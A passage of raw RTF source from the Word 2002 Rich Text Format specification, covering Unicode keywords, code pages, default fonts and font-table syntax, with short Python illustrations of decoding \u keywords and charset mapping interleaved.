\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\mac\cell }{Apple Macintosh\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\pc\cell }{IBM PC code page 437\cell }\pard \widctlpar\intbl\adjustright {\row
}\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b \\pca\cell }{IBM PC code page 850, used by IBM Personal System/2 (not implemented in version 1 of Microsoft Word for OS/2)
\cell }\pard \widctlpar\intbl\adjustright {\f5 \row }\pard\plain \s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {{\*\bkmkstart _Toc379295355}{\*\bkmkstart _Toc380819773}{\*\bkmkstart _Toc381591824}{\*\bkmkstart _Toc382644185}
{\*\bkmkstart _Toc383176016}{\*\bkmkstart _Toc386002174}{\*\bkmkstart _Toc386539805}{\*\bkmkstart Unicode_RTF}{\*\bkmkstart _Toc519492440}{\*\bkmkstart _Toc521909683}{\*\bkmkstart _Ref281718258}{\*\bkmkstart _Ref281718288}{\*\bkmkstart _Ref281718720}
{\*\bkmkstart _Toc313960802}{\*\bkmkstart _Toc335399076}Unicode RTF{\*\bkmkend _Toc379295355}{\*\bkmkend _Toc380819773}{\*\bkmkend _Toc381591824}{\*\bkmkend _Toc382644185}{\*\bkmkend _Toc383176016}{\*\bkmkend _Toc386002174}{\*\bkmkend _Toc386539805}
{\*\bkmkend Unicode_RTF}{\*\bkmkend _Toc519492440}{\*\bkmkend _Toc521909683}
\par }\pard\plain \s15\li288\sa120\widctlpar\adjustright \f1\fs20\cgrid {Word 2002 is a Unicode-enabled application. Text is ha
ndled using the 16-bit Unicode character encoding scheme. Expressing this text in RTF requires a new mechanism, because until this release (version 1.6), RTF has only handled 7-bit characters directly and 8-bit characters encoded as hexadecimal. The Unico
de mechanism described here can be applied to any RTF destination or body text.
\par
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2112\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10032\pard\plain \s98\sb240\sl199\slmult1\keepn\widctlpar\intbl\brdrbtw\brdrs\brdrw15 \adjustright \b\f1\fs20\cgrid {
Control word\cell Meaning\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2112\clvertalt\cltxlrtb \cellx10032\pard\plain \s68\sb60\sa60\widctlpar\intbl\adjustright \b\f1\fs20\cgrid {
\\ansicpg}{\i N}{\cell }\pard\plain \sb120\sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {This keyword represents the ANSI code page used to perform the Unicode to ANSI conversion when writing RTF text. }{\b\i N}{ represents the code page in d
ecimal. This is typically set to the default ANSI code page of the run-time environment (for example, }{\b \\ansicpg1252}{
for U.S. Windows). The reader can use the same ANSI code page to convert ANSI text back to Unicode. Possible values include the following:
\par }\pard \sa120\nowidctlpar\intbl\adjustright {\cs113\cf1\revised\revdttm1714774824 437\tab United States IBM
\par 708\tab Arabic (ASMO 708)
\par 709\tab Arabic (ASMO 449+, BCON V4)
\par 710\tab Arabic (transparent Arabic)
\par 711\tab Arabic (Nafitha Enhanced)
\par 720\tab Arabic (transparent ASMO)
\par 819\tab Windows 3.1 (United States and Western Europe)
\par 850\tab IBM multilingual
\par 852\tab Eastern European
\par 860\tab Portuguese
\par 862\tab Hebrew
\par 863\tab French Canadian
\par 864\tab Arabic
\par 865\tab Norwegian
\par 866\tab Soviet Union
\par }{\cs113\cf1\revised\revdttm1714774825 874}{\cs113\cf1\revised\revdttm1714774826 \tab }{\cs113\cf1\revised\revdttm1714774825 Thai
\par }{\cs113\cf1\revised\revdttm1714774824 932\tab Japanese
\par }{\cs113\cf1\revised\revdttm1714774825 936}{\cs113\cf1\revised\revdttm1714774826 \tab }{\cs113\cf1\revised\revdttm1714774825 Simplified Chinese
\par 949}{\cs113\cf1\revised\revdttm1714774826 \tab }{\cs113\cf1\revised\revdttm1714774825 Korean
\par 950}{\cs113\cf1\revised\revdttm1714774826 \tab }{\cs113\cf1\revised\revdttm1714774825 Traditional Chinese
\par }{\cs113\cf1\revised\revdttm1714774824 1250}{\cs113\cf1\revised\revdttm1714774826 \tab }{\cs113\cf1\revised\revdttm1714774824 Windows 3.1 (Eastern European)
\par 1251\tab Windows 3.1 (Cyrillic)
\par 1252}{\cs113\cf1\revised\revdttm1714774827 \tab }{\cs113\cf1\revised\revdttm1714774824 Western European
\par 1253}{\cs113\cf1\revised\revdttm1714774828 \tab }{\cs113\cf1\revised\revdttm1714774824 Greek
\par 1254}{\cs113\cf1\revised\revdttm1714774828 \tab }{\cs113\cf1\revised\revdttm1714774824 Turkish
\par 1255}{\cs113\cf1\revised\revdttm1714774828 \tab }{\cs113\cf1\revised\revdttm1714774824 Hebrew
\par 1256}{\cs113\cf1\revised\revdttm1714774828 \tab }{\cs113\cf1\revised\revdttm1714774824 Arabic
\par 1257}{\cs113\cf1\revised\revdttm1714774827 \tab }{\cs113\cf1\revised\revdttm1714774824 Baltic
\par 1258}{\cs113\cf1\revised\revdttm1714774827 \tab }{\cs113\cf1\revised\revdttm1714774824 Vietnamese
\par 1361}{\cs113\cf1\revised\revdttm1714774829 \tab }{\cs113\cf1\revised\revdttm1714774824 Johab}{\cs113\cf1
\par }{This keyword should be emitted in the RTF header section right after the }{\b \\ansi}{, }{\b \\mac}{, }{\b \\pc}{ or }{\b \\pca}{ keyword.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard\plain \s68\sb60\sa60\widctlpar\intbl\adjustright
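The ANSI-to-Unicode round trip described above can be sketched in Python (an illustration, not part of the specification): the `\ansicpgN` argument selects a Windows code page, which maps directly onto Python's standard `cpNNNN` codecs. The function name is our own.

```python
# Sketch: mapping an \ansicpgN value to a Python codec in order to convert
# 8-bit ANSI RTF text back to Unicode. Assumes the standard "cpNNNN" codec
# names cover the code page in question.

def decode_ansi_run(raw_bytes: bytes, ansicpg: int = 1252) -> str:
    """Decode a run of 8-bit RTF text using the document's \\ansicpg value."""
    return raw_bytes.decode("cp%d" % ansicpg)

# The same byte means different things under different code pages:
# 0xE9 is "é" in Windows-1252, while 0xF9 is Cyrillic "щ" in Windows-1251.
print(decode_ansi_run(b"caf\xe9", 1252))  # -> café
print(decode_ansi_run(b"\xf9", 1251))     # -> щ
```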
\b\f1\fs20\cgrid {\\upr\cell }\pard\plain \sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {This keyword represents a destination with two embedded
destinations, one represented using Unicode and the other using ANSI. This keyword operates in conjunction with the }{\b \\ud }{keyword to provide backward compatibility. The general syntax is as follows:
\par }\pard\plain \s70\li432\sa120\widctlpar\intbl\adjustright \f2\fs16\cgrid {\{\\upr\{keyword ansi_text\}\{\\*\\ud\{keyword Unicode_text\}\}\}
\par }\pard\plain \sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {Notice that this keyword destination does not use the }{\b \\* }{keyword; this forces the old RTF readers to pick up the ANSI representation and discard the Unicode one.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard\plain \s68\sb60\sa60\widctlpar\intbl\adjustright \b\f1\fs20\cgrid {\\ud\cell }\pard\plain \sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {
This is a destination that is represented in Unicode. The text is represented using a mixture of ANSI translation and use of }{\b \\u}{\b\i N }{keywords to represent characters that do not have the exact ANSI equivalent.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard\plain \s68\sb60\sa60\widctlpar\intbl\adjustright \b\f1\fs20\cgrid {\\u}{\i N}{ \cell }\pard\plain \sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {
This keyword represents a single Unicode character that has no equivalent ANSI representation based on the current ANSI code page. }{\b\i N}{ represents the Unicode character value expressed as a decimal number.
\par This keyword is followed immediately by equivalent character(s) in ANSI representation. In this way, old readers will ignore the }{\b \\u}{\b\i N}{ keyword and pick up the ANSI representation properly. Wh
en this keyword is encountered, the reader should ignore the next }{\b\i N}{ characters, where }{\b\i N}{\b }{corresponds to the last }{\b \\uc}{\b\i N}{ value encountered.
\par As with all RTF keywords, a keyword-terminating space may be present (before the ANSI characters) that is not counted in the characters to skip. While this is not likely to occur (or recommended), a }{\b \\bin}{
keyword, its argument, and the binary data that follows are considered one character for skipping purposes. If an RTF scope delimiter character (that is, an opening or clos
ing brace) is encountered while scanning skippable data, the skippable data is considered to be ended before the delimiter. This makes it possible for a reader to perform some rudimentary error recovery. To include an RTF delimiter in skippable data, it m
ust be represented using the appropriate control symbol (that is, escaped with a backslash) as in plain text. Any RTF control word or symbol is considered a single character for the purposes of counting skippable characters.
\par An RTF writer, when it encounters a Unicode character with no corresponding ANSI character, should output }{\b \\u}{\b\i N}{
followed by the best ANSI representation it can manage. Also, if the Unicode character translates into an ANSI character stream with count of bytes differing from the current Unicode Character Byte Count, it should emit the }{\b \\uc}{\b\i N}{
keyword prior to the }{\b \\u}{\b\i N}{\b }{keyword}{\b }{to notify the reader of the change.
\par RTF control words generally accept signed 16-bit numbers as arguments. For this reason, Unicode values greater than 32767 must be expressed as negative numbers.\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb
\cellx2112\clvertalt\cltxlrtb \cellx10032\pard\plain \s68\sb60\sa60\widctlpar\intbl\adjustright \b\f1\fs20\cgrid {\\uc}{\i N}{\cell }\pard\plain \s74\sa60\widctlpar\intbl\adjustright \f1\fs22\cgrid {\fs20
This keyword represents the number of bytes corresponding to a given }{\b\fs20 \\u}{\b\i\fs20 N }{\fs20 Unicode character. This keyword may be used at any time, and values are scoped like character properties. That is, a }{\b\fs20 \\uc}{\b\i\fs20 N }{
\fs20 keyword applies only to text following the keyword, and within the same (or deeper) nested braces. On exiting the group, the previous }{\b\fs20 \\uc}{\fs20
value is restored. The reader must keep a stack of counts seen and use the most recent one to skip the appropriate number of characters when it encounters a }{\b\fs20 \\u}{\b\i\fs20 N }{\fs20 keyword. When leaving an RTF group that specified a }{\b\fs20
\\uc}{\fs20 value, the reader must revert to the previous value. A default of 1 should be assumed if no }{\b\fs20 \\uc}{\fs20 keyword has been seen in the current or outer scopes.
\par }\pard \s74\sb120\sa60\widctlpar\intbl\adjustright {A }{\fs20 common practice is to emit no ANSI representation for Unicode characters within a Unicode destination context (that is, inside a }{\b\fs20 \\ud}{\fs20
destination). Typically, the destination will contain a }{\b\fs20 \\uc0}{\fs20 control sequence. There is no need to reset the count on leaving the }{\b\fs20 \\ud }{\fs20 destination, because the scoping rules will ensure the previous value is restored.
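The stack of `\ucN` counts a reader must keep can be sketched as follows (an illustrative helper, not prescribed by the specification; the class and method names are our own):

```python
# Sketch: maintaining the \ucN skip-count stack an RTF reader needs.
# Group opens push the current count; group closes restore the previous one.

class UcTracker:
    def __init__(self):
        self.stack = [1]            # default \uc value is 1

    def open_group(self):           # seen '{'
        self.stack.append(self.stack[-1])

    def close_group(self):          # seen '}'
        if len(self.stack) > 1:
            self.stack.pop()

    def set_uc(self, n: int):       # seen \ucN
        self.stack[-1] = n

    @property
    def skip(self) -> int:          # characters to skip after each \uN
        return self.stack[-1]

t = UcTracker()
t.open_group(); t.set_uc(0)         # e.g. entering a \ud destination with \uc0
assert t.skip == 0
t.close_group()
assert t.skip == 1                  # previous value restored on group exit
```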
}{\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard\plain \s4\sb240\sa240\keepn\widctlpar\outlinelevel3\adjustright \b\i\f1\cgrid {{\*\bkmkstart _Toc379295356}{\*\bkmkstart _Toc380819774}{\*\bkmkstart Document_Text}Document Text
{\*\bkmkend _Toc379295356}{\*\bkmkend _Toc380819774}{\*\bkmkend Document_Text}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {Document text should be emitted as ANSI characters. If there are Unicode characters that do not have corresponding ANSI characters, they should be output using the }{\b \\uc}{\b\i N}{ and }{\b \\u}
{\b\i N}{ keywords.
\par For example, the text }{\b Lab}{\field\fldedit\fldlock{\*\fldinst {\b symbol 71 \\f "Symbol" \\s 10}}{\fldrslt {\b\f3 \u-4025\'47}}}{\b Value}{
(Unicode characters 0x004c, 0x0061, 0x0062, 0x0393, 0x0056, 0x0061, 0x006c, 0x0075, 0x0065) should be represented as follows (assuming a previous }{\b \\uc1}{):
\par }\pard\plain \s70\li432\sa120\widctlpar\adjustright \f2\fs16\cgrid {Lab\\u915GValue
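A reader's handling of this example can be sketched in Python (our own illustration, assuming `\uc1` is in effect): each `\uN` yields one Unicode character, the following ANSI fallback character is skipped, and negative arguments are mapped back from signed 16-bit form.

```python
import re

# Illustrative decoder (an assumption, not from the specification text):
# turn a run of RTF plain text containing \uN keywords into Unicode,
# skipping `uc` ANSI fallback characters per \uN.

def decode_u_keywords(rtf_text: str, uc: int = 1) -> str:
    out, i = [], 0
    pattern = re.compile(r"\\u(-?\d+) ?")   # optional keyword-terminating space
    while i < len(rtf_text):
        m = pattern.match(rtf_text, i)
        if m:
            n = int(m.group(1))
            if n < 0:                        # arguments are signed 16-bit numbers
                n += 65536
            out.append(chr(n))
            i = m.end() + uc                 # skip the ANSI fallback character(s)
        else:
            out.append(rtf_text[i])
            i += 1
    return "".join(out)

print(decode_u_keywords(r"Lab\u915GValue"))  # -> LabΓValue
```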
\par }\pard\plain \s4\sb240\sa240\keepn\widctlpar\outlinelevel3\adjustright \b\i\f1\cgrid {{\*\bkmkstart _Toc379295357}{\*\bkmkstart _Toc380819775}{\*\bkmkstart Destination_text}Destination Text{\*\bkmkend _Toc379295357}{\*\bkmkend _Toc380819775}
{\*\bkmkend Destination_text}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {Destination text is defined as any text represented in an RTF destination. A good example is the bookmark name in the }{\b \\bkmkstart}{ destination.
\par Any destination containing Unicode characters should be emitted as two destinations within a }{\b \\upr}{ destination to ensure that old readers can read it properly and that no Unicode character encoding is lost when read with a new reader.
\par For example, a bookmark name }{\b Lab}{\field\fldedit\fldlock{\*\fldinst {\b symbol 71 \\f "Symbol" \\s 10}}{\fldrslt {\b\f3 \u-4025\'47}}}{\b Value}{
(Unicode characters 0x004c, 0x0061, 0x0062, 0x0393, 0x0056, 0x0061, 0x006c, 0x0075, 0x0065) should be represented as follows:
\par }\pard\plain \s70\li432\sa120\widctlpar\adjustright \f2\fs16\cgrid {\{\\upr\{\\*\\bkmkstart LabGValue\}\{\\*\\ud\{\\*\\bkmkstart Lab\\u915Value\}\}\}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {The first subdestination contains only ANSI characters and is the representation that old readers will see. The second subdestination is a }{\b \\*\\ud }{
destination that contains a second copy of the }{\b \\bkmkstart}{ destination. This copy can contain Unicode characters and is the representation that Unicode-aware readers must pay attention to, ignoring the ANSI-only version.
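A writer producing such a dual destination could proceed as in this sketch (the helper name is hypothetical; only the emitted syntax follows the `\upr` form shown above):

```python
# Hypothetical writer helper: emit a destination as a \upr group with an
# ANSI subdestination and a \*\ud copy, so that old readers fall back to
# the ANSI text while Unicode-aware readers use the \ud copy.

def make_upr(keyword: str, ansi_text: str, unicode_text: str) -> str:
    return "{\\upr{%s %s}{\\*\\ud{%s %s}}}" % (
        keyword, ansi_text, keyword, unicode_text)

print(make_upr("\\*\\bkmkstart", "LabGValue", "Lab\\u915Value"))
# -> {\upr{\*\bkmkstart LabGValue}{\*\ud{\*\bkmkstart Lab\u915Value}}}
```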
\par }\pard\plain \s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {{\*\bkmkstart _Default_Fonts}{\*\bkmkstart _Toc521909684}{\*\bkmkstart _Toc380819776}{\*\bkmkstart _Toc381591825}{\*\bkmkstart _Toc382644186}
{\*\bkmkstart _Toc383176017}{\*\bkmkstart _Toc386002175}{\*\bkmkstart _Toc386539806}{\*\bkmkstart Font_Table}{\*\bkmkstart _Toc519492441}{\*\bkmkend _Default_Fonts}Default Fonts{\*\bkmkend _Toc521909684}
\par }\pard\plain \s15\sa120\nowidctlpar\adjustright \f1\fs20\cgrid {Default font settings can be used to tell the program what regional settings are appropriate as defaults. For example, having a Japanese font set in }{\b \\stshfdbch}{\b\i N }{
would tell Word to enable Japanese formatting options. }{\b\i N}{ refers to an entry in the font table.
\par }\pard \s15\li288\sa120\nowidctlpar\adjustright {
\par }\trowd \trgaph108\trrh360\trleft-108 \clvertalt\cltxlrtb \cellx1608\clvertalt\cltxlrtb \cellx9543\pard \s15\li-93\sa120\nowidctlpar\intbl\adjustright {\cell }{\b \\stshfdbch}{\b\i N}{\b \\stshfloch}{\b\i N}{\b \\stshfhich}{\b\i N}{\b \\
stshfbi\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\trowd \trgaph108\trrh360\trleft-108 \clvertalt\cltxlrtb \cellx1608\clvertalt\cltxlrtb \cellx9543\pard\plain \s15\sa120\nowidctlpar\intbl\adjustright \f1\fs20\cgrid {\b \\
stshfdbch}{\b\i N}{\cell }\pard \s15\li-93\sa120\nowidctlpar\intbl\adjustright {Defines what font should be used by default in the style sheet for Far East characters. }{\b\i \cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row
}\pard\plain \s15\sa120\nowidctlpar\intbl\adjustright \f1\fs20\cgrid {\b \\stshfloch}{\b\i N}{\b \cell }\pard \s15\li-93\sa120\nowidctlpar\intbl\adjustright {Defines what font should be used by default in the style sheet for ASCII characters.\cell
}\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard\plain \s15\sa120\nowidctlpar\intbl\adjustright \f1\fs20\cgrid {\b \\stshfhich}{\b\i N}{\b \cell }\pard \s15\li-93\sa120\nowidctlpar\intbl\adjustright {
Defines what font should be used by default in the style sheet for High-ANSI characters. \cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\trowd \trgaph108\trrh360\trleft-108 \clvertalt\cltxlrtb \cellx1608\clvertalt\cltxlrtb
\cellx9543\pard\plain \s15\sa120\nowidctlpar\intbl\adjustright \f1\fs20\cgrid {\b \\stshfbi\cell }\pard \s15\li-93\sa120\nowidctlpar\intbl\adjustright {Defines what font should be used by default in the style sheet for Complex Scripts (BiDi) characters.
\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard\plain \s15\li288\sa120\nowidctlpar\adjustright \f1\fs20\cgrid {
\par }\pard\plain \s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {{\*\bkmkstart _Toc521909685}Font Table{\*\bkmkend _Ref281718258}{\*\bkmkend _Ref281718288}{\*\bkmkend _Ref281718720}{\*\bkmkend _Toc313960802}
{\*\bkmkend _Toc335399076}{\*\bkmkend _Toc380819776}{\*\bkmkend _Toc381591825}{\*\bkmkend _Toc382644186}{\*\bkmkend _Toc383176017}{\*\bkmkend _Toc386002175}{\*\bkmkend _Toc386539806}{\*\bkmkend Font_Table}{\*\bkmkend _Toc519492441}
{\*\bkmkend _Toc521909685}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {The }{\b \\fonttbl}{ control word introduces the font table group. Unique }{\b \\f}{\b\i N}{
control words define each font available in the document, and are used to reference that font throughout the document. The font table group has the following syntax.
\par }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {<fonttbl>\cell }{\lang1036 '\{' }{\b\lang1036 \\fonttbl }{\lang1036 (<fontinfo> | ('\{' <fontinfo> '\}'))+ '\}'\cell }\pard
\widctlpar\intbl\adjustright {\lang1036 \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {<fontinfo>\cell
<fontnum><fontfamily><fcharset>? <fprq>? <panose>? <nontaggedname>? <fontemb>? <codepage>? <fontname><fontaltname>? }{\lang3082 ';' \cell }\pard \widctlpar\intbl\adjustright {\lang3082 \row }\pard \sa120\widctlpar\intbl\adjustright {\lang3082
<fontnum>\cell }{\b\i\lang3082 \\f}{\lang3082 \cell }\pard \widctlpar\intbl\adjustright {\lang3082 \row }\pard \sa120\widctlpar\intbl\adjustright {\lang3082 <fontfamily>\cell }{\b\lang3082 \\fnil}{\lang3082 | }{\b\lang3082 \\froman}{\lang3082 | }{\b\lang3082 \\
fswiss}{\lang3082 | }{\b\lang3082 \\fmodern}{\lang3082 | }{\b\lang3082 \\fscript}{\lang3082 | }{\b\lang3082 \\fdecor}{\lang3082 | }{\b\lang3082 \\ftech}{\lang3082 | }{\b\lang3082 \\fbidi}{\lang3082 \cell }\pard \widctlpar\intbl\adjustright {
\lang3082 \row }\pard \sa120\widctlpar\intbl\adjustright {<fcharset>\cell }{\b \\}{\b\i fcharset}{\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {<fprq>\cell }{\b \\}{\b\i fprq}{\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {<panose>\cell }{\b <data>\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {<nontaggedname>\cell \\*\\}{\b fname}{\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {<fontname>\cell #PCDATA\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {<fontaltname>\cell }{\lang1053 '\{}{\b\lang1053 \\*}{\lang1053
'}{\b\lang1053 \\falt }{\lang1053 #PCDATA '\}'}{\b\i\lang1053 \cell }\pard \widctlpar\intbl\adjustright {\lang1053 \row }\pard \sa120\widctlpar\intbl\adjustright {<fontemb>\cell }{\lang1036 '\{\\*' }{\b\lang1036 \\fontemb}{\lang1036
<fonttype> <fontfname>? }{<data>? '\}'\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {<fonttype>\cell }{\b \\ftnil}{ | }{\b \\fttruetype}{\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\sa120\widctlpar\intbl\adjustright {<fontfname>\cell }{\lang1036 '\{\\*' }{\b\lang1036 \\fontfile}{\lang1036 <codepage>? #PCDATA '\}'\cell }\pard \widctlpar\intbl\adjustright {\lang1036 \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160
\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {<codepage>\cell }\pard\plain \s71\sa240\widctlpar\intbl\adjustright \f1\fs20\cgrid {\\}{\b\i cpg}{\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard
\sa120\widctlpar\adjustright {
\par Note for <fontemb> that either <fontfname> or <data> must be present, although both may be present.
\par All fonts available to the RTF writer can be included in the font table, even if the document doesn't use all the fonts.
\par RTF also supports font families so that applications can attempt to intelligently choose fonts if the exact font is not present on the reading system. RTF uses the following control words to describe the various font families.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx6498\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx9738\pard \ri-720\sa120\widctlpar\intbl\adjustright {\b Control word
\cell Font family\cell Examples\cell }\pard \widctlpar\intbl\adjustright {\b \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx6498\clvertalt\cltxlrtb \cellx9738\pard \sb120\sa120\widctlpar\intbl\adjustright {\b \\fnil
\cell }{Unknown or default fonts (the default)\cell Not applicable\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \ri-720\sa120\widctlpar\intbl\adjustright {\b \\froman\cell }{Roman, proportionally spaced serif fonts\cell Times New Roman, Palatino
\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \ri-720\sa120\widctlpar\intbl\adjustright {\b \\fswiss\cell }{Swiss, proportionally spaced sans serif fonts\cell Arial\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\ri-720\sa120\widctlpar\intbl\adjustright {\b \\fmodern\cell }{Fixed-pitch serif and sans serif fonts\cell Courier New, Pica\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \ri-720\sa120\widctlpar\intbl\adjustright {\b \\fscript\cell }{Script fonts
\cell Cursive\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \ri-720\sa120\widctlpar\intbl\adjustright {\b \\fdecor\cell }{Decorative fonts\cell Old English, ITC Zapf Chancery\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\ri-720\sa120\widctlpar\intbl\adjustright {\b \\ftech\cell }{Technical, symbol, and mathematical fonts\cell Symbol\cell }\pard \widctlpar\intbl\adjustright {\f5 \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx6498
\clvertalt\cltxlrtb \cellx9738\pard \ri-720\sa240\widctlpar\intbl\adjustright {\b \\fbidi\cell }{Arabic, Hebrew, or other bidirectional font\cell Miriam\cell }\pard \widctlpar\intbl\adjustright {\f5 \row }\pard \sa120\widctlpar\adjustright {
\par If an RTF file uses a default font, the default font number is specified with the }{\b \\deff}{\b\i N}{ control word, which must precede the font-table group. The RTF writer supplies the default font number used in the creati
on of the document as the numeric argument }{\b\i N}{. The RTF reader then translates this number through the font table into the most similar font available on the reader's system.
\par The following control words specify the character set, alternative font name, pitch of a font in the font table, and nontagged font name.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b Control word\cell Meaning\cell }\pard \widctlpar\intbl\adjustright {\b
\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sb120\sa120\widctlpar\intbl\adjustright {\b \\fcharset}{\b\i N }{\b \cell }\pard \sa120\nowidctlpar\intbl\adjustright {
Specifies the character set of a font in the font table. Values for }{\b\i N}{ are defined by Windows header files:
\par }{\cs113\cf1 0\tab ANSI
\par 1\tab Default
\par 2\tab Symbol
\par 3\tab Invalid
\par 77\tab Mac
\par 128\tab Shift Jis
\par 129\tab Hangul
\par 130\tab Johab
\par 134\tab GB2312
\par 136\tab Big5
\par 161\tab Greek
\par 162\tab Turkish
\par 163\tab Vietnamese
\par 177\tab Hebrew
\par 178\tab Arabic
\par 179\tab Arabic Traditional
\par 180\tab Arabic user
\par 181\tab Hebrew user
\par 186\tab Baltic
\par 204\tab Russian
\par 222\tab Thai
\par 238\tab Eastern European
\par 254\tab PC 437
\par 255\tab OEM}{\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\falt\cell }{Indicates alternate font name to use if the specified font in the font table is not available. '}{\b \{\\*' \\falt}{
'}{\b \}}{' \cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\fprq}{\b\i N }{\b \cell }{Specifies the pitch of a font in the font table.\cell }\pard \widctlpar\intbl\adjustright {\row
}\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10032\pard\plain \s68\sb60\sa60\widctlpar\intbl\adjustright \b\f1\fs20\cgrid {\\*\\panose\cell }\pard\plain \s21\sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {
Destination keyword. This destination contains a 10-byte Panose 1 number. Each byte represents a single font property as described by the Panose 1 standard specification.\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\trowd
\trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b \\*\\fname\cell }{
This is an optional control word in the font table to define the nontagged font name. This is the actual name of the font without the tag, used to show wh
ich character set is being used. For example, Arial is a nontagged font name, and Arial (Cyrillic) is a tagged font name. This control word is used by WordPad. Word ignores this control word (and never creates it).\cell }\pard
\widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10032\pard \sa120\widctlpar\intbl\adjustright {\b\cf1 \\fbias}{\b\i\cf1 N}{\cell }\pard \sa120\widctlpar\intbl\tx480\adjustright {\cf1
Used to arbitrate between two fonts when a particular character can exist in either non-Far East or Far East font. Word 97 through Word 2002 emit the }{\b\cf1 \\fbiasN }{\cf1 keyword only in the context of bullets or list information (that is, a }{\b\cf1
\\listlevel }{\cf1 destination). The default value of 0 for }{\b\cf1 N}{\cf1 indicates a non-Far East font. A value of 1 indicates a Far East font. Additional values may be defined in future releases.\cell }\pard \widctlpar\intbl\adjustright {\row
}\pard \sa120\widctlpar\adjustright {
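A reader resolving font-tagged text can translate the `\fcharsetN` values above into ANSI code pages. The following partial mapping is an illustration based on the common Windows charset constants, not part of the specification; values such as 2 (Symbol), 77 (Mac) and 255 (OEM) have no single Windows ANSI code page and are omitted.

```python
# Partial \fcharsetN -> ANSI code page mapping (illustrative, not exhaustive).

FCHARSET_TO_CODEPAGE = {
    0: 1252,     # ANSI
    128: 932,    # Shift JIS (Japanese)
    129: 949,    # Hangul (Korean)
    130: 1361,   # Johab
    134: 936,    # GB2312 (Simplified Chinese)
    136: 950,    # Big5 (Traditional Chinese)
    161: 1253,   # Greek
    162: 1254,   # Turkish
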